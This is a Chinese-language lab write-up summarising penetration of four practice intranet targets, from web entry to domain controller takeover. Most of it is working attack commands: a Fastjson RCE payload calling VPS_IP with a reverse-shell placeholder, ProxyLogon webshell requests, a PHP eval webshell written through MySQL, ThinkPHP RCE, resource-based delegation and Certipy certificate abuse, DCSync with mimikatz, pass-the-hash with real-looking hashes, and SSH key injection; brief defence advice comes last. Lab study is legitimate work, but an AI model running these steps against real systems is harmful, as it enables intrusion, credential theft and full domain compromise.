模拟实战内网渗透靶标总结笔记
字数 1679 2025-08-23 18:31:18
内网渗透实战靶场总结与教学文档
靶场概述
本教学文档基于多个内网渗透实战靶场(网鼎杯半决赛复盘靶标、Exchange靶标、Delivery靶标、Initial靶标)的渗透过程总结,涵盖从外网打点到内网横向移动、权限提升直至域控拿下的完整流程。
1. 网鼎杯半决赛复盘靶标
1.1 初始信息收集
- 目标识别:39.101.173.234运行WordPress 6.4.3
- 后台访问:/wp-admin/ 弱口令admin/123456
- Getshell方法:修改404.php模板文件
- 路径:/wp-content/themes/twentytwentyone/404.php
1.2 内网探测
使用fscan扫描内网,关键发现:
172.22.15.24: MS17-010漏洞
172.22.15.13: 域控(XR-DC01.xiaorang.lab)
172.22.15.35: XR-0687
172.22.15.18: XR-CA.xiaorang.lab
1.3 隧道搭建
使用nps搭建socks5代理(端口3333):
- Kali作为nps服务端
- 靶机作为npc客户端
1.4 横向移动技术
1.4.1 永恒之蓝利用(MS17-010)
proxychains psexec.py administrator@172.22.15.24 -hashes ':0e52d03e9b939997401466a0ec5a9cbc' -codec gbk
1.4.2 AS-REP Roasting攻击
前提条件:域控未开启预身份验证
1.4.3 基于资源的约束性委派(RBCD)攻击
完整流程:
- 添加机器用户
proxychains -q impacket-addcomputer xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -computer-name 'hacker1$' -computer-pass 'Admin@123' - 配置委派权限
proxychains rbcd.py xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'hacker1$' - 获取ST票据
proxychains impacket-getST xiaorang.lab/'hacker1$':'Admin@123' -dc-ip 172.22.15.13 -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator - 横向移动
proxychains -q impacket-psexec -k -no-pass -dc-ip 172.22.15.13 administrator@XR-0687.xiaorang.lab -codec gbk
1.4.4 AD域权限提升漏洞(CVE-2022-26923)
利用Certipy工具:
- 枚举证书模板
proxychains certipy find -u 'lixiuying@xiaorang.lab' -p 'winniethepooh' -dc-ip 172.22.15.13 -vulnerable -stdout - 创建恶意机器账户
proxychains -q certipy account create -user 'hacker2$' -pass 'Admin@123' -dns XR-DC01.xiaorang.lab -dc-ip 172.22.15.13 -u lixiuying -p 'winniethepooh' - 证书转换与利用
openssl pkcs12 -in xr-dc01.pfx -nodes -out test.pem openssl rsa -in test.pem -out test.key openssl x509 -in test.pem -out test.crt - 使用PassTheCert工具进行权限提升
2. Exchange靶标渗透
2.1 初始攻击面
- 华夏ERP 2.3系统
- Fastjson 1.2.55 RCE漏洞
2.2 Fastjson RCE利用
构造恶意请求:
{
"name": {
"@type": "java.lang.AutoCloseable",
"@type": "com.mysql.jdbc.JDBC4Connection",
"hostToConnectTo": "VPS_IP",
"portToConnectTo": 3306,
"info": {
"user": "yso_CommonsCollections6_bash反弹命令",
"password": "pass",
"statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
"autoDeserialize": "true",
"NUM_HOSTS": "1"
}
}
}
2.3 内网信息
172.22.3.2: 域控(XIAORANG-WIN16)
172.22.3.9: Exchange服务器(XIAORANG-EXC01)
2.4 Exchange漏洞利用(ProxyLogon)
proxychains python3 exprolog.py -t 172.22.3.9 -e administrator@xiaorang.lab
proxychains curl --request POST --url https://172.22.3.9/owa/auth/ncyev.aspx --data 'request=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami /all").stdout.readall())' -k
2.5 DCSync攻击
- 为账户添加DCSync权限
powershell -command "Add-DomainObjectAcl -TargetIdentity 'DC=xiaorang,DC=lab' -PrincipalIdentity Zhangtong -Rights DCSync -Verbose" - 执行DCSync
mimikatz "lsadump::dcsync /domain:xiaorang.lab /all /csv" - 哈希传递攻击
proxychains psexec.py administrator@172.22.3.2 -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb -codec gbk
3. Delivery靶标渗透
3.1 初始攻击
- XStream 1.4.16 RCE漏洞(CVE-2021-29505)
- 利用sun.rmi.registry.RegistryImpl_Stub构造RMI请求
3.2 内网信息
172.22.13.6: 域控(WIN-DC)
172.22.13.28: WIN-HAUWOLAO(OA系统)
172.22.13.57: CentOS(NFS服务)
3.3 MySQL提权
- 写Webshell
select "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php"; - 创建RDP用户
net user test P@ssw0rd /add net localgroup administrators test /add
3.4 RBCD攻击流程
- 添加机器账户
proxychains addcomputer.py xiaorang.lab/chenglei:'Xt61f3LBhg1' -computer-name 'TEST$' -computer-pass 'P@ssw0rd' - 配置委派
proxychains rbcd.py xiaorang.lab/chenglei:'Xt61f3LBhg1' -action write -delegate-to 'WIN-DC$' -delegate-from 'TEST$' - 获取ST票据
proxychains getST.py xiaorang.lab/'TEST$':'P@ssw0rd' -spn cifs/WIN-DC.xiaorang.lab -impersonate Administrator
3.5 NFS服务提权
- 挂载NFS共享
mkdir test mount -t nfs 172.22.13.57:./ ./test -o nolock - SSH密钥注入
cat /root/.ssh/id_rsa.pub >> /test/home/joyce/.ssh/authorized_keys - 编译SUID程序提权
4. Initial靶标渗透
4.1 初始攻击
- ThinkPHP 5.0.23 RCE
POST /index.php?s=captcha _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
4.2 MySQL提权
sudo mysql -e '\! /bin/sh'
4.3 内网信息
172.22.1.2: 域控(DC01)
172.22.1.18: 信呼OA系统
172.22.1.21: XIAORANG-WIN7(MS17-010)
4.4 信呼OA漏洞利用
上传Webshell脚本:
import requests
session = requests.session()
url_pre = 'http://172.22.1.18/'
data1 = {'adminuser': 'YWRtaW4=::', 'adminpass': 'YWRtaW4xMjM='}
r = session.post(url_pre+'?a=check&m=login', data=data1)
r = session.post(url_pre+'/index.php?a=upfile&m=upload', files={'file': open('1.php','r+')})
4.5 DCSync攻击
- 使用Kiwi模块获取凭据
load kiwi creds_all - 执行DCSync
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv - 哈希传递
proxychains psexec.py -hashes :10cf89a850fb1cdbe6bb432b859164c8 XIAORANG.LAB/administrator@172.22.1.2
5. 关键工具总结
-
扫描工具:
- fscan:内网主机和端口扫描
- nmap/zenmap:基础扫描
-
代理工具:
- nps:高性能内网穿透代理
- chisel:轻量级隧道工具
-
横向移动工具:
- impacket套件(psexec, wmiexec等)
- mimikatz:凭证提取与攻击
- certipy:AD证书服务攻击
-
漏洞利用工具:
- ProxyLogon/ProxyShell利用脚本
- MS17-010利用脚本
- ThinkPHP/Fastjson等漏洞利用脚本
-
信息收集工具:
- BloodHound:AD域关系分析
- PowerView:PowerShell AD信息收集
6. 防御建议
-
补丁管理:
- 及时修复MS17-010等已知漏洞
- 保持中间件和框架最新版本
-
权限控制:
- 遵循最小权限原则
- 限制域账户的DCSync权限
- 监控敏感权限变更
-
监控与检测:
- 监控异常票据请求
- 检测异常机器账户创建
- 关注异常域控制器通信
-
安全配置:
- 启用LDAP签名和加密
- 限制NTLM使用
- 配置合理的证书模板权限
-
安全意识:
- 避免使用弱口令
- 定期进行安全审计
- 实施多因素认证
本教学文档涵盖了从外网突破到内网横向移动、权限提升直至域控拿下的完整攻击链,重点介绍了各种内网渗透技术和工具的实际应用,可作为内网渗透测试的学习参考和实践指南。